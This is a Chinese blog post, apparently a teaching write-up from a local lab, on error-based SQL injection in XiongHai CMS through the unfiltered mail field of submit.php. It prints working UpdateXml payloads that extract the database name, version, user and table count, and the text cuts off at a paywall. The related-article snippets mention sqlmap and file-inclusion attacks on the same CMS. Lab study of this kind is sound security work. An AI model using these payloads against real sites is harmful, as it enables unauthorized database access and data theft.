熊海CMS报错注入

原创 已于 2022-12-09 12:11:15 修改 · 2.9k 阅读 · 18 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#mysql #安全 #数据库

于 2021-04-02 20:44:34 首次发布
本文详细介绍了SQL注入中的报错注入方法,包括利用UpdateXml和ExtractValue函数获取数据库信息。同时,通过实例演示了如何使用Burpsuite和sqlmap进行爆破表名,并解决在实践中遇到的报错、调试和乱码问题。最后,讨论了updatexml和extractvalue函数的工作原理及在注入中的应用。

文章目录

前言


        记上次的熊海CMS代码审计后,这周z男十三年给学弟们讲了sql注入的报错注入,期间遇到了不少坑,欢迎阅读这篇文章的师傅们一起探讨学习。


分析过程


0x01.注入点源码分析


        1、首先要装一个熊海cms的网站在本机上,并完成配置(要关闭魔术引号)。点击“联系”,并拉到最下面“发表留言”处。
在这里插入图片描述
        2、用RIPS对整个网站的根目录进行扫描,发现submit.php 文件下存在SQL报错注入,即存在报错提示,由此定位到文件 /files/submit.php (注意不要定位到/admin/files 这是后台的文件目录)
在这里插入图片描述
        3、运用 phpstorm 阅读文件源码
在这里插入图片描述
        4、发现只有 $type 参数进行了过滤,其他参数都是直接传递,但这时候一定要注意可能会引入些文件进行过滤(例如waf文件),以防万一也可以打开 inc 下的 conn.php 看看。
在这里插入图片描述
        5、可以看出前面的代码都没有对 name、mail、url 等参数进行过滤。

        6、找到数据库插入的地方(找一个SELECT语句),发现 $mail 参数会直接传递给数据库,由此我们就可以对这下手,在邮箱后面进行sql报错注入的操作
在这里插入图片描述

0x02.报错注入的利用方法

        通过构造错误的xml格式获取到数据库内容

1.UpdateXml

#获取数据库

') or updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)--+

#获取数据库版本信息

') or updatexml(1,concat(0x7e,(SELECT version()),0x7e),1)--+

#获取用户

') or updatexml(1,concat(0x7e,(SELECT user()),0x7e),1)--+

#获取表数量

') or updatexml(1,concat(0x7e,(SELECT count(table_name) from
 information_schema.tables where table_schema=database()),
 0x7e),1)--+

#获取表数据

') or updatexml(1,concat(0x7e,(SE

最低0.47元/天 解锁文章
【网络安全 | PHP代码审计】熊海cms
等风来
09-17 2534
可以看到,GET传参r参数,判断参数 $file 是否为空,如果为空,默认为 ‘index’,否则将 $file 的值赋给 $action,然后进行包含操作。所以可以实现目录穿越、文件包含。
【漏洞复现】熊海cms 存在sql注入 附poc
失心少年
11-26 1648
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。其采用前后端整合设计思路,php,Apache,mysql,前端使用Bootstrap和少许jquery前端框架开发;熊海CMS 是由熊海开发的一款可广泛应用于个人博客,个人网站,企业网站的一套网站综合管理系统。
文件包含漏洞
wutiangui的博客
07-07 1236
php:// — 访问各个输入/输出流(I/O streams)不受allow_url_fopen和allow_url_include影响(filter需要4个参数)/usr/local/app/apache2/conf/httpd.conf //apache2配置文件。/usr/local/app/php5/lib/php.ini //php配置文件。/etc/httpd/conf/httpd.conf //apache配置文件。resoure=<要过滤的数据流> 必须参数,指定筛选过滤的数据流。
熊海cms v1.0 SQL注入漏洞复现
weixin_46801402的博客
07-29 3812
熊海CMS是一款可广泛应用于个人博客,个人网站,企业网站的一套网站综合管理系统,熊海CMS存在SQL注入漏洞,攻击者可利用该漏洞获取数据库敏感信息。
熊海CMS漏洞练习平台的一次xss、sql注入、越权黑盒思路分析
xt350488的博客
07-14 2949
建议自定义错误页面,以避免编程语言特性导致的网站根目录泄露问题,从而减少不必要的安全风险。原文:https://mp.weixin.qq.com/s/NkyXg3Dm5ZzFUGpqn0uzBQ。
熊海CMS网站SQL注入、XSS攻击、cookie篡改
m0_63917373的博客
11-01 2503
熊海CMS sqlmap工具 SQL注入 XSS cookie篡改
熊海CMS_V1.0代码审计与漏洞分析及采坑日记(一)--文件包含漏洞
qq_28624871的博客
03-13 7443
熊海CMS_V1.0代码审计与漏洞分析及采坑日记(一)–文件包含漏洞 前言 最近几天在给协会的学弟讲代码审计入门相关内容,便找了这个熊海CMS_V1.0来教学,结果在这个过程中遇到蛮多问题的,于是这篇文章详细记录了对熊海CMS_V1.0从搭建到审计与漏洞分析的过程,其中踩了很多坑,这些坑网上也没有什么记录,也是我之前学习过程中没有去仔细发现和研究的,果然古人诚不欺我,温故而知新,通过给学弟们讲这个简单的代码审计又学习到了很多新的内容,也欢迎阅读这篇文章的师傅们对文章出现的问题一起探讨交流,不足的地方也请多多
熊海(isea cms)代码审计漏洞总结
Alexz__的博客
04-30 7201
iseacms简介 后台越权登录admin用户 后台/admin下SQL注入 文件包含漏洞 存储型XSS 管理界面CSRF删除文章 壹 iseacms简介 熊海CMS 是由熊海开发的一款可广泛应用于个人博客,个人网站,企业网站的一套网站综合管理系统。 其采用前后端整合设计思路,php,Apache,mysql,前端使用Bootstrap和少许jquery前端框架开发; 网站样式设计简洁大方,整体功能点并不多,但功能正好够用;拥有一个前端客户端访问界面和一个完备的后台管理系统,并...
熊海cms代码审计
最新发布
a2FpX2tr的博客
04-15 688
把数据包保存成test.txt python sqlmap.py -r test.txt。editcolumn.php里面不止这里有sql注入,其他执行sql语句的地方也有注入。变量delete和delete2可控,并被带到sql语句中执行,字符型,使用报错注入。变量action可控,并被include函数包含。使用了mysql_error函数,使用报错注入。变量user可控并被带到sql语句中执行。要添加变量type=1才会执行SQL语句。burp抓包,发送到repeater。都是可控的,存在注入
熊海CMS后台登录逻辑漏洞
m0_52920608的博客
04-07 1394
熊海cms登录脆弱检测
熊海CMS v1.0
10-08
熊海CMS是由熊海开发的一款可广泛应用于个人博客,个人网站,企业网站的一套网站综合管理系统。适用于个人博客、个人网站、企业网站等各种用途,前台采用电脑、移动端两种显示
熊海CMS v1.0.rar
07-06
熊海CMS更新说明: 2015-03-21 19:45 修复linux服务器上后台登录空白的问题。   熊海CMS 是由熊海开发的一款可广泛应用于个人博客,个人网站,企业网站的一套网站综合管理系统。   目前系统已经集成:代码高亮、广告模块、文件图片上传、图片水印、图片缩略图,智能头像,互动邮件通知等。部份模块添加多种实用功能,欢迎体验。   安装方法:上传到空间后,打开访问地址,按照安装向导设置后台管理信息及数据库信息即可。   相关阅读   同类推荐:cms系统
熊海CMS_V1.zip
09-28
熊海CMS_V1.zip
cms靶场报错注入
weixin_58954236的博客
08-27 217
外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-cccNOLwS-1693124305344)(https://gitee.com/JIe1207/img/raw/master/img/202308231503787.png)]查看数据库中的表,数据库中的表名,列名在information_schema数据库中保存,查看information_schema数据库表,先查看cms中有多少表得到结果有8个表。得到数据库名、表名和列名,查看用户名和密码。得到用户名:admin。
熊海CMS 1.0代码审计漏洞集合
渗透之路,攻防之间皆学问
10-11 6362
熊海CMS是由熊海开发的一款可广泛应用于个人博客,个人网站,企业网站的一套网站综合管理系统。适用于个人博客、个人网站、企业网站等各种用途,前台采用电脑、移动端两种显示模式,后台使用HML5响应式布局。 下载 ——>熊海cms v1.0 SQL注入1 漏洞位置:commen.php 漏洞参数:cid 如下传入的cid参数经过了addslashes函数的过滤处理,能过滤掉引号字符 但是如下语句中cid参数并没有被引号包裹,故addslashes函数对其不生效,存在数字型注入 在cid.
复现熊海cms的漏洞
p_utao的博客
09-07 3369
前期准备
熊海cms渗透测试
Panacea
07-16 2630
本来是用来练习代码审计的一个网站,但是代码审计真的好难啊,然后把这个换成了渗透了嘿嘿 安装 这个安装费老大劲了,我用的是phpstudy安装的,全部文件必须在www目录下,其他的都不行 然后php版本要改成5.X 后台 拿到后测试下/admin /login 得到/admin为后台地址 使用弱口令及常见密码失败,尝试其他地方获取用户名和密码 SQL注入 看到这种带有id的尝试SQL注入 加个单引号,报错 手注无果,上sqlmap跑一跑吧hhhhhhhhh 可知存在注入,继续跑,得到用户名和密码,登
汇总-熊海CMS代码审计-入门网络安全知识点
程序员六七的博客
05-17 1038
我正在参加「掘金·启航计划」前言熊海CMS是由熊海开发的一款可广泛应用于个人博客,个人网站,企业网站的一套网站综合管理系统。作为一个早期的系统,里面代码存在许多漏洞利用点
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值